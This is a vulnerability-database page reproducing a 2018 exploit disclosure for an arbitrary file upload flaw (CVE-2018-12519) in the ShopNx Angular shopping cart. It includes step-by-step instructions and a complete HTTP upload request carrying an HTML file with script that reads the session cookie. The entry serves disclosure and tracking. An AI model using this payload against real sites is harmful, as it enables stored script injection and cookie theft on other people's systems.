Lucene search
K

ShopNx - Arbitrary File Upload

🗓️ 04 Jul 2018 00:00:00Reported by L0RDType 
exploitpack
 exploitpack
👁 20 Views

ShopNx 1 Angular 5 Single Page Application Arbitrary File Uploa

Related
Code
ReporterTitlePublishedViews
Family
0day.today
ShopNx - Arbitrary File Upload Vulnerability
4 Jul 201800:00
zdt
CNVD
ShopNx Arbitrary File Upload Vulnerability
20 Jun 201800:00
cnvd
CVE
CVE-2018-12519
19 Jun 201821:00
cve
Cvelist
CVE-2018-12519
19 Jun 201821:00
cvelist
Exploit DB
ShopNx - Arbitrary File Upload
4 Jul 201800:00
exploitdb
EUVD
EUVD-2018-4489
7 Oct 202500:30
euvd
NVD
CVE-2018-12519
19 Jun 201821:29
nvd
Packet Storm
ShopNx Arbitrary File Upload
4 Jul 201800:00
packetstorm
Prion
Hardcoded credentials
19 Jun 201821:29
prion
# Exploit Title: ShopNx - Angular5 Single Page Shopping Cart Application 1 - Arbitrary File Upload
# Date: 2018-07-03
# Exploit Author: L0RD
# Email: [email protected]
# Vendor Homepage: http://codenx.com/
# Version: 1
# CVE: CVE-2018-12519
# Tested on: Win 10
===================================================
# Description :
ShopNx 1 is an Angular 5 single page application which suffers from
arbitrary file upload vulnerability .
Attacker can upload malicious files on server because
the application fails to sufficiently sanitize user-supplied input.

# POC :
1) Login as a regular user and navigate to "edit profile"
2) Click on "Avatar" and upload your HTML file which contains malicious javascript code.
3) You can find your uploaded file here :
   Path : http://shop.codenx.com/uploads/[Your File]


# Request :
=========================
POST /api/media HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site.com/account/edit-profile
Content-Length: 367
Content-Type: multipart/form-data;
boundary=---------------------------31031276124582
Connection: keep-alive

-----------------------------31031276124582
Content-Disposition: form-data; name="file"; filename="file.html"
Content-Type: text/html

<html>
<head>
<title>TEST</title>
</head>
<body>
    <script>
        console.log(document.cookie);
    </script>
</body>
</html>
-----------------------------31031276124582--

====================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jul 2018 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.07864
20